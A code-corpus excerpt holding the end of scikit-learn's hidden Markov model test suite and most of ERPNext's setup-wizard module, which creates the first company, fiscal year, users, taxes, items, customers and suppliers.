            print
            print ('Test train: %s (%s)\n  %s\n  %s'
                   % (self.covariance_type, params, trainll, np.diff(trainll)))
        delta_min = np.diff(trainll).min()
        self.assertTrue(
            delta_min > -0.8,
            "The min nll increase is %f which is lower than the admissible"
            " threshold of %f, for model %s. The likelihoods are %s."
            % (delta_min, -0.8, self.covariance_type, trainll))
    def test_fit_works_on_sequences_of_different_length(self):
        obs = [self.prng.rand(3, self.n_features),
               self.prng.rand(4, self.n_features),
               self.prng.rand(5, self.n_features)]
        h = hmm.GaussianHMM(self.n_components, self.covariance_type)
        # This shouldn't raise
        # ValueError: setting an array element with a sequence.
        h.fit(obs)
    def test_fit_with_priors(self, params='stmc', n_iter=5, verbose=False):
        startprob_prior = 10 * self.startprob + 2.0
        transmat_prior = 10 * self.transmat + 2.0
        means_prior = self.means
        means_weight = 2.0
        covars_weight = 2.0
        if self.covariance_type in ('full', 'tied'):
            covars_weight += self.n_features
        covars_prior = self.covars[self.covariance_type]
        h = hmm.GaussianHMM(self.n_components, self.covariance_type)
        h.startprob_ = self.startprob
        h.startprob_prior = startprob_prior
        h.transmat_ = hmm.normalize(self.transmat
                                    + np.diag(self.prng.rand(self.n_components)), 1)
        h.transmat_prior = transmat_prior
        h.means_ = 20 * self.means
        h.means_prior = means_prior
        h.means_weight = means_weight
        h.covars_ = self.covars[self.covariance_type]
        h.covars_prior = covars_prior
        h.covars_weight = covars_weight
        # Create training data by sampling from the HMM.
        train_obs = [h.sample(n=10)[0] for x in xrange(10)]
        # Mess up the parameters and see if we can re-learn them.
        h.n_iter = 0
        h.fit(train_obs[:1])
        trainll = train_hmm_and_keep_track_of_log_likelihood(
            h, train_obs, n_iter=n_iter, params=params)[1:]
        # Check that the loglik is always increasing during training
        if not np.all(np.diff(trainll) > 0) and verbose:
            print
            print ('Test MAP train: %s (%s)\n  %s\n  %s'
                   % (self.covariance_type, params, trainll, np.diff(trainll)))
        # XXX: Why such a large tolerance?
        self.assertTrue(np.all(np.diff(trainll) > -0.5))
class TestGaussianHMMWithSphericalCovars(GaussianHMMBaseTester, TestCase):
    # Runs the shared GaussianHMM tests with spherical covariances.
    covariance_type = 'spherical'
    def test_fit_startprob_and_transmat(self):
        # Restrict fitting to startprob ('s') and transmat ('t') only.
        self.test_fit('st')
class TestGaussianHMMWithDiagonalCovars(GaussianHMMBaseTester, TestCase):
    # Runs the shared GaussianHMM tests with diagonal covariances.
    covariance_type = 'diag'
class TestGaussianHMMWithTiedCovars(GaussianHMMBaseTester, TestCase):
    # Runs the shared GaussianHMM tests with a single tied covariance.
    covariance_type = 'tied'
class TestGaussianHMMWithFullCovars(GaussianHMMBaseTester, TestCase):
    # Runs the shared GaussianHMM tests with full covariance matrices.
    covariance_type = 'full'
class MultinomialHMMTestCase(TestCase):
    """Using examples from Wikipedia
    - http://en.wikipedia.org/wiki/Hidden_Markov_model
    - http://en.wikipedia.org/wiki/Viterbi_algorithm
    """
    def setUp(self):
        self.prng = np.random.RandomState(9)
        self.n_components = 2   # ('Rainy', 'Sunny')
        self.n_symbols = 3  # ('walk', 'shop', 'clean')
        self.emissionprob = [[0.1, 0.4, 0.5], [0.6, 0.3, 0.1]]
        self.startprob = [0.6, 0.4]
        self.transmat = [[0.7, 0.3], [0.4, 0.6]]
        self.h = hmm.MultinomialHMM(self.n_components,
                                    startprob=self.startprob,
                                    transmat=self.transmat)
        self.h.emissionprob_ = self.emissionprob
    def test_wikipedia_viterbi_example(self):
        # From http://en.wikipedia.org/wiki/Viterbi_algorithm:
        # "This reveals that the observations ['walk', 'shop', 'clean']
        # were most likely generated by states ['Sunny', 'Rainy',
        # 'Rainy'], with probability 0.01344."
        observations = [0, 1, 2]
        logprob, state_sequence = self.h.decode(observations)
        self.assertAlmostEqual(np.exp(logprob), 0.01344)
        assert_array_equal(state_sequence, [1, 0, 0])
    def test_attributes(self):
        # Property setters must validate normalization and shapes.
        h = hmm.MultinomialHMM(self.n_components)
        self.assertEquals(h.n_components, self.n_components)
        h.startprob_ = self.startprob
        assert_array_almost_equal(h.startprob_, self.startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          2 * self.startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          np.zeros((self.n_components - 2, self.n_symbols)))
        h.transmat_ = self.transmat
        assert_array_almost_equal(h.transmat_, self.transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          2 * self.transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          np.zeros((self.n_components - 2, self.n_components)))
        h.emissionprob_ = self.emissionprob
        assert_array_almost_equal(h.emissionprob_, self.emissionprob)
        self.assertRaises(ValueError, h.__setattr__, 'emissionprob_', [])
        self.assertRaises(ValueError, h.__setattr__, 'emissionprob_',
                          np.zeros((self.n_components - 2, self.n_symbols)))
        self.assertEquals(h.n_symbols, self.n_symbols)
    def test_eval(self):
        idx = np.repeat(range(self.n_components), 10)
        nobs = len(idx)
        obs = [int(x) for x in np.floor(self.prng.rand(nobs) * self.n_symbols)]
        ll, posteriors = self.h.eval(obs)
        self.assertEqual(posteriors.shape, (nobs, self.n_components))
        assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
    def test_sample(self, n=1000):
        samples = self.h.sample(n)[0]
        self.assertEquals(len(samples), n)
        self.assertEquals(len(np.unique(samples)), self.n_symbols)
    def test_fit(self, params='ste', n_iter=5, verbose=False, **kwargs):
        h = self.h
        # Create training data by sampling from the HMM.
        train_obs = [h.sample(n=10)[0] for x in xrange(10)]
        # Mess up the parameters and see if we can re-learn them.
        h.startprob_ = hmm.normalize(self.prng.rand(self.n_components))
        h.transmat_ = hmm.normalize(self.prng.rand(self.n_components,
                                                   self.n_components), axis=1)
        h.emissionprob_ = hmm.normalize(
            self.prng.rand(self.n_components, self.n_symbols), axis=1)
        trainll = train_hmm_and_keep_track_of_log_likelihood(
            h, train_obs, n_iter=n_iter, params=params, **kwargs)[1:]
        # Check that the loglik is always increasing during training
        # (Python 2 print statements).
        if not np.all(np.diff(trainll) > 0) and verbose:
            print
            print 'Test train: (%s)\n  %s\n  %s' % (params, trainll,
                                                    np.diff(trainll))
        self.assertTrue(np.all(np.diff(trainll) > - 1.e-3))
    def test_fit_emissionprob(self):
        # Fit only the emission probabilities ('e').
        self.test_fit('e')
def create_random_gmm(n_mix, n_features, covariance_type, prng=0):
    """Build a ``mixture.GMM`` with random means/weights and covariances of
    the requested type, drawn from *prng* (int seed or RandomState).

    NOTE(review): all four covariance parametrizations are computed even
    though only one is kept; restructuring this would change the order in
    which *prng* is consumed and hence downstream deterministic values —
    leave as-is.
    """
    prng = check_random_state(prng)
    g = mixture.GMM(n_mix, covariance_type=covariance_type)
    g.means_ = prng.randint(-20, 20, (n_mix, n_features))
    # Floor on the covariance magnitude to keep matrices well-conditioned.
    mincv = 0.1
    g.covars_ = {
        'spherical': (mincv + mincv * np.dot(prng.rand(n_mix, 1),
                                             np.ones((1, n_features)))) ** 2,
        'tied': (make_spd_matrix(n_features, random_state=prng)
                 + mincv * np.eye(n_features)),
        'diag': (mincv + mincv * prng.rand(n_mix, n_features)) ** 2,
        'full': np.array(
            [make_spd_matrix(n_features, random_state=prng)
             + mincv * np.eye(n_features) for x in xrange(n_mix)])
    }[covariance_type]
    g.weights_ = hmm.normalize(prng.rand(n_mix))
    return g
class GMMHMMBaseTester(object):
    """Shared test logic for ``hmm.GMMHMM`` (HMM with GMM emissions).

    NOTE(review): ``setUp`` unconditionally sets the *instance* attribute
    ``self.covariance_type = 'diag'``, which shadows the ``covariance_type``
    *class* attribute of the concrete subclasses ('tied'/'full') — confirm
    whether that shadowing is intentional.
    """
    def setUp(self):
        self.prng = np.random.RandomState(9)
        self.n_components = 3
        self.n_mix = 2
        self.n_features = 2
        self.covariance_type = 'diag'
        self.startprob = self.prng.rand(self.n_components)
        self.startprob = self.startprob / self.startprob.sum()
        self.transmat = self.prng.rand(self.n_components, self.n_components)
        self.transmat /= np.tile(self.transmat.sum(axis=1)[:, np.newaxis],
                                 (1, self.n_components))
        # One random GMM per hidden state.
        self.gmms = []
        for state in xrange(self.n_components):
            self.gmms.append(create_random_gmm(
                self.n_mix, self.n_features, self.covariance_type,
                prng=self.prng))
    def test_attributes(self):
        h = hmm.GMMHMM(self.n_components, covariance_type=self.covariance_type)
        self.assertEquals(h.n_components, self.n_components)
        h.startprob_ = self.startprob
        assert_array_almost_equal(h.startprob_, self.startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          2 * self.startprob)
        self.assertRaises(ValueError, h.__setattr__, 'startprob_', [])
        self.assertRaises(ValueError, h.__setattr__, 'startprob_',
                          np.zeros((self.n_components - 2, self.n_features)))
        h.transmat_ = self.transmat
        assert_array_almost_equal(h.transmat_, self.transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          2 * self.transmat)
        self.assertRaises(ValueError, h.__setattr__, 'transmat_', [])
        self.assertRaises(ValueError, h.__setattr__, 'transmat_',
                          np.zeros((self.n_components - 2, self.n_components)))
    def test_eval_and_decode(self):
        h = hmm.GMMHMM(self.n_components, gmms=self.gmms)
        # Make sure the means are far apart so posteriors.argmax()
        # picks the actual component used to generate the observations.
        for g in h.gmms:
            g.means_ *= 20
        refstateseq = np.repeat(range(self.n_components), 5)
        nobs = len(refstateseq)
        obs = [h.gmms[x].sample(1).flatten() for x in refstateseq]
        ll, posteriors = h.eval(obs)
        self.assertEqual(posteriors.shape, (nobs, self.n_components))
        assert_array_almost_equal(posteriors.sum(axis=1), np.ones(nobs))
        viterbi_ll, stateseq = h.decode(obs)
        assert_array_equal(stateseq, refstateseq)
    def test_sample(self, n=1000):
        h = hmm.GMMHMM(self.n_components, self.covariance_type,
                       startprob=self.startprob, transmat=self.transmat,
                       gmms=self.gmms)
        samples = h.sample(n)[0]
        self.assertEquals(samples.shape, (n, self.n_features))
    def test_fit(self, params='stmwc', n_iter=5, verbose=False, **kwargs):
        h = hmm.GMMHMM(self.n_components, covars_prior=1.0)
        h.startprob_ = self.startprob
        h.transmat_ = hmm.normalize(
            self.transmat + np.diag(self.prng.rand(self.n_components)), 1)
        h.gmms = self.gmms
        # Create training data by sampling from the HMM.
        train_obs = [h.sample(n=10,
                              random_state=self.prng)[0] for x in xrange(10)]
        # Mess up the parameters and see if we can re-learn them.
        h.n_iter = 0
        h.fit(train_obs)
        h.transmat_ = hmm.normalize(self.prng.rand(self.n_components,
                                                   self.n_components), axis=1)
        h.startprob_ = hmm.normalize(self.prng.rand(self.n_components))
        trainll = train_hmm_and_keep_track_of_log_likelihood(
            h, train_obs, n_iter=n_iter, params=params)[1:]
        if not np.all(np.diff(trainll) > 0) and verbose:
            print
            print 'Test train: (%s)\n  %s\n  %s' % (params, trainll,
                                                    np.diff(trainll))
        # XXX: this test appears to check that training log likelihood should
        # never be decreasing (up to a tolerance of 0.5, why?) but this is not
        # the case when the seed changes.
        raise SkipTest("Unstable test: trainll is not always increasing "
                       "depending on seed")
        # NOTE: unreachable — deliberately skipped above; kept for reference.
        self.assertTrue(np.all(np.diff(trainll) > -0.5))
    def test_fit_works_on_sequences_of_different_length(self):
        obs = [self.prng.rand(3, self.n_features),
               self.prng.rand(4, self.n_features),
               self.prng.rand(5, self.n_features)]
        h = hmm.GMMHMM(self.n_components, covariance_type=self.covariance_type)
        # This shouldn't raise
        # ValueError: setting an array element with a sequence.
        h.fit(obs)
class TestGMMHMMWithDiagCovars(GMMHMMBaseTester, TestCase):
    # Runs the shared GMMHMM tests with diagonal covariances.
    covariance_type = 'diag'
    def test_fit_startprob_and_transmat(self):
        self.test_fit('st')
    def test_fit_means(self):
        self.test_fit('m')
class TestGMMHMMWithTiedCovars(GMMHMMBaseTester, TestCase):
    # Runs the shared GMMHMM tests with tied covariances (but see the
    # shadowing note on GMMHMMBaseTester.setUp).
    covariance_type = 'tied'
class TestGMMHMMWithFullCovars(GMMHMMBaseTester, TestCase):
    # Runs the shared GMMHMM tests with full covariances (but see the
    # shadowing note on GMMHMMBaseTester.setUp).
    covariance_type = 'full'
def test_normalize_1D():
    """hmm.normalize() on a 1-D array must make the values sum to 1."""
    A = rng.rand(2) + 1.0
    for axis in range(1):  # a 1-D array has exactly one axis
        Anorm = hmm.normalize(A, axis)
        # np.allclose already reduces to a single bool — the original
        # np.all() wrapper was a no-op and has been removed.
        assert np.allclose(Anorm.sum(axis), 1.0)
def test_normalize_3D():
    """hmm.normalize() along each axis of a 3-D array must yield unit sums."""
    A = rng.rand(2, 2, 2) + 1.0
    for axis in range(3):
        Anorm = hmm.normalize(A, axis)
        # np.allclose already reduces to a single bool — the original
        # np.all() wrapper was a no-op and has been removed.
        assert np.allclose(Anorm.sum(axis), 1.0)
| GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/sklearn/tests/test_hmm.py | Python | agpl-3.0 | 26,383 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, json, copy
from frappe.utils import cstr, flt, getdate
from frappe import _
from frappe.utils.file_manager import save_file
from frappe.translate import (set_default_language, get_dict,
get_lang_dict, send_translations, get_language_from_code)
from frappe.geo.country_info import get_country_info
from frappe.utils.nestedset import get_root_of
from .default_website import website_maker
import install_fixtures
from .sample_data import make_sample_data
from erpnext.accounts.utils import FiscalYearError
@frappe.whitelist()
def setup_account(args=None):
	"""Run the complete setup wizard: create company, fiscal year, users,
	defaults, price lists, taxes, items, customers, suppliers and website.

	``args`` may be a dict or a JSON string (falls back to the request's
	form_dict). Raises if a Company already exists. On failure, fires the
	``setup_wizard_exception`` hooks and re-raises; on success, fires
	``setup_wizard_success``.
	"""
	try:
		# Guard: the wizard must only ever run once per site.
		if frappe.db.sql("select name from tabCompany"):
			frappe.throw(_("Setup Already Complete!!"))
		if not args:
			args = frappe.local.form_dict
		if isinstance(args, basestring):
			args = json.loads(args)
		args = frappe._dict(args)
		if args.language and args.language != "english":
			set_default_language(args.language)
		frappe.clear_cache()
		install_fixtures.install(args.get("country"))
		update_user_name(args)
		# message_log is cleared after each step so a partial failure does
		# not flood the client with stale messages.
		frappe.local.message_log = []
		create_fiscal_year_and_company(args)
		frappe.local.message_log = []
		create_users(args)
		frappe.local.message_log = []
		set_defaults(args)
		frappe.local.message_log = []
		create_territories()
		frappe.local.message_log = []
		create_price_lists(args)
		frappe.local.message_log = []
		create_feed_and_todo()
		frappe.local.message_log = []
		create_email_digest()
		frappe.local.message_log = []
		create_letter_head(args)
		frappe.local.message_log = []
		create_taxes(args)
		frappe.local.message_log = []
		create_items(args)
		frappe.local.message_log = []
		create_customers(args)
		frappe.local.message_log = []
		create_suppliers(args)
		frappe.local.message_log = []
		frappe.db.set_default('desktop:home_page', 'desktop')
		website_maker(args.company_name.strip(), args.company_tagline, args.name)
		create_logo(args)
		frappe.db.commit()
		login_as_first_user(args)
		frappe.db.commit()
		frappe.clear_cache()
		if args.get("add_sample_data"):
			try:
				make_sample_data()
			except FiscalYearError:
				# Sample data is best-effort; ignore fiscal-year mismatches.
				pass
	except:
		if args:
			traceback = frappe.get_traceback()
			for hook in frappe.get_hooks("setup_wizard_exception"):
				frappe.get_attr(hook)(traceback, args)
		raise
	else:
		for hook in frappe.get_hooks("setup_wizard_success"):
			frappe.get_attr(hook)(args)
def update_user_name(args):
    """Create or update the first (wizard) user.

    When an email is supplied, a new User is created silently (welcome
    mail and notification emails muted) and its password set; otherwise
    the current session user is updated. Also stores an optional profile
    image and grants the user all non-built-in roles.

    Side effect: writes the resolved user name into ``args['name']``.
    """
    if args.get("email"):
        args['name'] = args.get("email")
        # Suppress outgoing mails while creating the account.
        frappe.flags.mute_emails = True
        doc = frappe.get_doc({
            "doctype":"User",
            "email": args.get("email"),
            "first_name": args.get("first_name"),
            "last_name": args.get("last_name")
        })
        doc.flags.no_welcome_mail = True
        doc.insert()
        frappe.flags.mute_emails = False
        from frappe.auth import _update_password
        _update_password(args.get("email"), args.get("password"))

    else:
        args['name'] = frappe.session.user

    # Update User
    # The client may send the literal string 'None' for a blank last name.
    if not args.get('last_name') or args.get('last_name')=='None':
        args['last_name'] = None
    frappe.db.sql("""update `tabUser` SET first_name=%(first_name)s,
        last_name=%(last_name)s WHERE name=%(name)s""", args)

    if args.get("attach_user"):
        # attach_user is "filename,filetype,base64content" (3-way split below).
        attach_user = args.get("attach_user").split(",")
        if len(attach_user)==3:
            filename, filetype, content = attach_user
            fileurl = save_file(filename, content, "User", args.get("name"), decode=True).file_url
            frappe.db.set_value("User", args.get("name"), "user_image", fileurl)

    add_all_roles_to(args.get("name"))
def create_fiscal_year_and_company(args):
    """Create the first Fiscal Year and the Company record from wizard input.

    Side effect: stores the fiscal year label in ``args['curr_fiscal_year']``
    for later steps (used by set_defaults).
    """
    curr_fiscal_year = get_fy_details(args.get('fy_start_date'), args.get('fy_end_date'))
    frappe.get_doc({
        "doctype":"Fiscal Year",
        'year': curr_fiscal_year,
        'year_start_date': args.get('fy_start_date'),
        'year_end_date': args.get('fy_end_date'),
    }).insert()

    # Company
    frappe.get_doc({
        "doctype":"Company",
        'domain': args.get("industry"),
        'company_name':args.get('company_name').strip(),
        'abbr':args.get('company_abbr'),
        'default_currency':args.get('currency'),
        'country': args.get('country'),
        'chart_of_accounts': args.get(('chart_of_accounts')),
    }).insert()

    # Remember the fiscal year label on args for later wizard steps.
    args["curr_fiscal_year"] = curr_fiscal_year
def create_price_lists(args):
    """Create the two default price lists, "Standard Selling" and
    "Standard Buying", in the wizard currency, attached to the root
    territory."""
    defaults = (
        ("Selling", _("Standard Selling")),
        ("Buying", _("Standard Buying")),
    )
    for kind, title in defaults:
        price_list = frappe.get_doc({
            "doctype": "Price List",
            "price_list_name": title,
            "enabled": 1,
            "buying": 1 if kind == "Buying" else 0,
            "selling": 1 if kind == "Selling" else 0,
            "currency": args["currency"],
            "territories": [{
                "territory": get_root_of("Territory")
            }]
        })
        price_list.insert()
def set_defaults(args):
    """Write wizard selections into the framework's Settings singletons:
    Global Defaults, System Settings, Accounts/Stock/Selling/Buying
    Settings, Notification Control and HR Settings."""
    # enable default currency
    frappe.db.set_value("Currency", args.get("currency"), "enabled", 1)

    global_defaults = frappe.get_doc("Global Defaults", "Global Defaults")
    global_defaults.update({
        'current_fiscal_year': args.curr_fiscal_year,
        'default_currency': args.get('currency'),
        'default_company':args.get('company_name').strip(),
        "country": args.get("country"),
    })
    global_defaults.save()

    number_format = get_country_info(args.get("country")).get("number_format", "#,###.##")

    # replace these as float number formats, as they have 0 precision
    # and are currency number formats and not for floats
    if number_format=="#.###":
        number_format = "#.###,##"
    elif number_format=="#,###":
        number_format = "#,###.##"

    system_settings = frappe.get_doc("System Settings", "System Settings")
    system_settings.update({
        "language": args.get("language"),
        "time_zone": args.get("timezone"),
        "float_precision": 3,
        "email_footer_address": args.get("company"),
        'date_format': frappe.db.get_value("Country", args.get("country"), "date_format"),
        'number_format': number_format,
        # Never enable the scheduler while running the test suite.
        'enable_scheduler': 1 if not frappe.flags.in_test else 0
    })
    system_settings.save()

    accounts_settings = frappe.get_doc("Accounts Settings")
    accounts_settings.auto_accounting_for_stock = 1
    accounts_settings.save()

    stock_settings = frappe.get_doc("Stock Settings")
    stock_settings.item_naming_by = "Item Code"
    stock_settings.valuation_method = "FIFO"
    stock_settings.stock_uom = _("Nos")
    stock_settings.auto_indent = 1
    stock_settings.auto_insert_price_list_rate_if_missing = 1
    stock_settings.save()

    selling_settings = frappe.get_doc("Selling Settings")
    selling_settings.cust_master_name = "Customer Name"
    selling_settings.so_required = "No"
    selling_settings.dn_required = "No"
    selling_settings.save()

    buying_settings = frappe.get_doc("Buying Settings")
    buying_settings.supp_master_name = "Supplier Name"
    buying_settings.po_required = "No"
    buying_settings.pr_required = "No"
    buying_settings.maintain_same_rate = 1
    buying_settings.save()

    notification_control = frappe.get_doc("Notification Control")
    notification_control.quotation = 1
    notification_control.sales_invoice = 1
    notification_control.purchase_order = 1
    notification_control.save()

    hr_settings = frappe.get_doc("HR Settings")
    hr_settings.emp_created_by = "Naming Series"
    hr_settings.save()
def create_feed_and_todo():
    """Post an Activity feed entry announcing that setup is complete.

    NOTE(review): despite the function name, no ToDo records are created
    here — only the Feed comment below is inserted.
    """
    frappe.get_doc({
        "doctype": "Feed",
        "feed_type": "Comment",
        "subject": "ERPNext Setup Complete!"
    }).insert(ignore_permissions=True)
def create_email_digest():
    """Create a "Default Weekly Digest" per company plus a daily
    "Scheduler Errors" digest, all addressed to the System Managers.

    No-ops when there are no System Managers to receive the digests.
    """
    from frappe.utils.user import get_system_managers
    system_managers = get_system_managers(only_name=True)

    if not system_managers:
        return

    companies = frappe.db.sql_list("select name FROM `tabCompany`")
    for company in companies:
        if not frappe.db.exists("Email Digest", "Default Weekly Digest - " + company):
            edigest = frappe.get_doc({
                "doctype": "Email Digest",
                "name": "Default Weekly Digest - " + company,
                "company": company,
                "frequency": "Weekly",
                "recipient_list": "\n".join(system_managers)
            })

            # Enable every checkbox section except the scheduler-errors one,
            # which gets its own daily digest below.
            for df in edigest.meta.get("fields", {"fieldtype": "Check"}):
                if df.fieldname != "scheduler_errors":
                    edigest.set(df.fieldname, 1)

            edigest.insert()

    # scheduler errors digest
    if companies:
        edigest = frappe.new_doc("Email Digest")
        edigest.update({
            "name": "Scheduler Errors",
            "company": companies[0],
            "frequency": "Daily",
            "recipient_list": "\n".join(system_managers),
            "scheduler_errors": 1,
            "enabled": 1
        })
        edigest.insert()
def get_fy_details(fy_start_date, fy_end_date):
    """Return the fiscal-year label for the given date range.

    A fiscal year fully inside one calendar year is labelled "YYYY";
    one spanning two calendar years is labelled "YYYY-YYYY+1".
    """
    first_year = getdate(fy_start_date).year
    last_year = getdate(fy_end_date).year
    if first_year == last_year:
        return cstr(first_year)
    return cstr(first_year) + '-' + cstr(first_year + 1)
def create_taxes(args):
    """Create up to five Tax accounts (wizard fields tax_1..tax_5) under
    the company's liability tax group, plus matching sales and purchase
    tax templates. Duplicate accounts are silently skipped."""
    for i in xrange(1,6):
        if args.get("tax_" + str(i)):
            # replace % in case someone also enters the % symbol
            tax_rate = (args.get("tax_rate_" + str(i)) or "").replace("%", "")
            try:
                tax_group = frappe.db.get_value("Account", {"company": args.get("company_name"),
                    "is_group": 1, "account_type": "Tax", "root_type": "Liability"})
                if tax_group:
                    account = make_tax_head(args, i, tax_group, tax_rate)
                    make_sales_and_purchase_tax_templates(account)
            except frappe.NameError, e:
                # 1062 is the MySQL "duplicate entry" error code: the tax
                # account already exists, which is fine. Re-raise anything else.
                if e.args[2][0]==1062:
                    pass
                else:
                    raise
def make_tax_head(args, i, tax_group, tax_rate):
    """Insert and return the Account document for the i-th wizard tax entry."""
    return frappe.get_doc({
        "doctype":"Account",
        "company": args.get("company_name").strip(),
        "parent_account": tax_group,
        "account_name": args.get("tax_" + str(i)),
        "is_group": 0,
        "report_type": "Balance Sheet",
        "account_type": "Tax",
        # None (not 0) when no rate was entered, so the field stays blank.
        "tax_rate": flt(tax_rate) if tax_rate else None
    }).insert(ignore_permissions=True)
def make_sales_and_purchase_tax_templates(account):
    """Create a Sales and a Purchase Taxes-and-Charges template that
    charge the given tax Account on the net total."""
    doc = {
        "doctype": "Sales Taxes and Charges Template",
        "title": account.name,
        "taxes": [{
            "category": "Valuation and Total",
            "charge_type": "On Net Total",
            "account_head": account.name,
            "description": "{0} @ {1}".format(account.account_name, account.tax_rate),
            "rate": account.tax_rate
        }]
    }

    # Sales — deep-copied so that the mutation below cannot leak into
    # the already-inserted document's data.
    frappe.get_doc(copy.deepcopy(doc)).insert()

    # Purchase — same rows, different template doctype.
    doc["doctype"] = "Purchase Taxes and Charges Template"
    frappe.get_doc(copy.deepcopy(doc)).insert()
def create_items(args):
    """Create up to five Items (wizard fields item_1..item_5) with
    optional image and price-list rates. Items in the "Services" group
    are treated as non-stock items. Duplicates are silently skipped."""
    for i in xrange(1,6):
        item = args.get("item_" + str(i))
        if item:
            item_group = args.get("item_group_" + str(i))
            is_sales_item = args.get("is_sales_item_" + str(i))
            is_purchase_item = args.get("is_purchase_item_" + str(i))
            is_stock_item = item_group!=_("Services")
            default_warehouse = ""
            if is_stock_item:
                # Sales items default to Finished Goods, others to Stores.
                default_warehouse = frappe.db.get_value("Warehouse", filters={
                    "warehouse_name": _("Finished Goods") if is_sales_item else _("Stores"),
                    "company": args.get("company_name").strip()
                })

            try:
                frappe.get_doc({
                    "doctype":"Item",
                    "item_code": item,
                    "item_name": item,
                    "description": item,
                    "is_sales_item": 1 if is_sales_item else 0,
                    "is_purchase_item": 1 if is_purchase_item else 0,
                    "show_in_website": 1,
                    "is_stock_item": is_stock_item and 1 or 0,
                    "item_group": item_group,
                    "stock_uom": args.get("item_uom_" + str(i)),
                    "default_warehouse": default_warehouse
                }).insert()

                if args.get("item_img_" + str(i)):
                    # item_img is "filename,filetype,base64content".
                    item_image = args.get("item_img_" + str(i)).split(",")
                    if len(item_image)==3:
                        filename, filetype, content = item_image
                        fileurl = save_file(filename, content, "Item", item, decode=True).file_url
                        frappe.db.set_value("Item", item, "image", fileurl)

                if args.get("item_price_" + str(i)):
                    item_price = flt(args.get("item_price_" + str(i)))

                    if is_sales_item:
                        price_list_name = frappe.db.get_value("Price List", {"selling": 1})
                        make_item_price(item, price_list_name, item_price)

                    if is_purchase_item:
                        price_list_name = frappe.db.get_value("Price List", {"buying": 1})
                        make_item_price(item, price_list_name, item_price)

            except frappe.NameError:
                # Item already exists; leave it untouched.
                pass
def make_item_price(item, price_list_name, item_price):
    """Insert an Item Price record pinning *item* at *item_price* on the
    given price list."""
    price_doc = frappe.get_doc({
        "doctype": "Item Price",
        "item_code": item,
        "price_list": price_list_name,
        "price_list_rate": item_price,
    })
    price_doc.insert()
def create_customers(args):
    """Create up to five Customers (wizard fields customer_1..customer_5)
    with an optional primary contact each. Duplicates are skipped."""
    for i in xrange(1,6):
        customer = args.get("customer_" + str(i))
        if customer:
            try:
                frappe.get_doc({
                    "doctype":"Customer",
                    "customer_name": customer,
                    "customer_type": "Company",
                    "customer_group": _("Commercial"),
                    "territory": args.get("country"),
                    "company": args.get("company_name").strip()
                }).insert()

                if args.get("customer_contact_" + str(i)):
                    create_contact(args.get("customer_contact_" + str(i)),
                        "customer", customer)
            except frappe.NameError:
                # Customer already exists; leave it untouched.
                pass
def create_suppliers(args):
    """Create up to five Suppliers (wizard fields supplier_1..supplier_5)
    with an optional primary contact each. Duplicates are skipped."""
    for i in xrange(1,6):
        supplier = args.get("supplier_" + str(i))
        if supplier:
            try:
                frappe.get_doc({
                    "doctype":"Supplier",
                    "supplier_name": supplier,
                    "supplier_type": _("Local"),
                    "company": args.get("company_name").strip()
                }).insert()

                if args.get("supplier_contact_" + str(i)):
                    create_contact(args.get("supplier_contact_" + str(i)),
                        "supplier", supplier)
            except frappe.NameError:
                # Supplier already exists; leave it untouched.
                pass
def create_contact(contact, party_type, party):
    """Create a Contact record linked to the given party from a free-form
    name string.

    :param contact: full name, e.g. "Jane van Dyk"
    :param party_type: link fieldname on Contact ("customer" or "supplier")
    :param party: name of the linked Customer/Supplier record
    """
    # Split only once so multi-word last names survive intact and a run
    # of spaces cannot produce an empty last name (the old
    # `split(" ")[1]` dropped everything after the second token).
    # This matches the name parsing used in create_users.
    parts = contact.strip().split(" ", 1)
    frappe.get_doc({
        "doctype":"Contact",
        party_type: party,
        "first_name": parts[0],
        "last_name": parts[1] if len(parts) > 1 else ""
    }).insert()
def create_letter_head(args):
    """Create the default "Standard" Letter Head and, if an image was
    uploaded, store it and use it as the letter head content."""
    if args.get("attach_letterhead"):
        frappe.get_doc({
            "doctype":"Letter Head",
            "letter_head_name": _("Standard"),
            "is_default": 1
        }).insert()

        # attach_letterhead is "filename,filetype,base64content".
        attach_letterhead = args.get("attach_letterhead").split(",")
        if len(attach_letterhead)==3:
            filename, filetype, content = attach_letterhead
            fileurl = save_file(filename, content, "Letter Head", _("Standard"), decode=True).file_url
            frappe.db.set_value("Letter Head", _("Standard"), "content", "<img src='%s' style='max-width: 100%%;'>" % fileurl)
def create_logo(args):
    """Save the uploaded company logo and set it as the website brand
    (image + company name) in Website Settings."""
    if args.get("attach_logo"):
        # attach_logo is "filename,filetype,base64content".
        attach_logo = args.get("attach_logo").split(",")
        if len(attach_logo)==3:
            filename, filetype, content = attach_logo
            fileurl = save_file(filename, content, "Website Settings", "Website Settings",
                decode=True).file_url
            frappe.db.set_value("Website Settings", "Website Settings", "brand_html",
                "<img src='{0}' style='max-width: 40px; max-height: 25px;'> {1}".format(fileurl, args.get("company_name").strip()))
def add_all_roles_to(name):
    """Grant every Role to the given User, except the built-in and
    party-specific roles listed below."""
    user = frappe.get_doc("User", name)
    for role in frappe.db.sql("""select name from tabRole"""):
        if role[0] not in ["Administrator", "Guest", "All", "Customer", "Supplier", "Partner", "Employee"]:
            d = user.append("user_roles")
            d.role = role[0]
    # Single save after all roles have been appended.
    user.save()
def create_territories():
    """create two default territories, one for home country and one named Rest of the World"""
    from frappe.utils.nestedset import get_root_of
    country = frappe.db.get_default("country")
    root_territory = get_root_of("Territory")

    for name in (country, _("Rest Of The World")):
        if name and not frappe.db.exists("Territory", name):
            frappe.get_doc({
                "doctype": "Territory",
                # Apostrophes are stripped from the name — presumably to
                # avoid breaking name-based links; verify before changing.
                "territory_name": name.replace("'", ""),
                "parent_territory": root_territory,
                "is_group": "No"
            }).insert()
def login_as_first_user(args):
    """Switch the current session to the wizard's first user, when an
    email was given and a login manager is available on frappe.local."""
    email = args.get("email")
    if not email:
        return
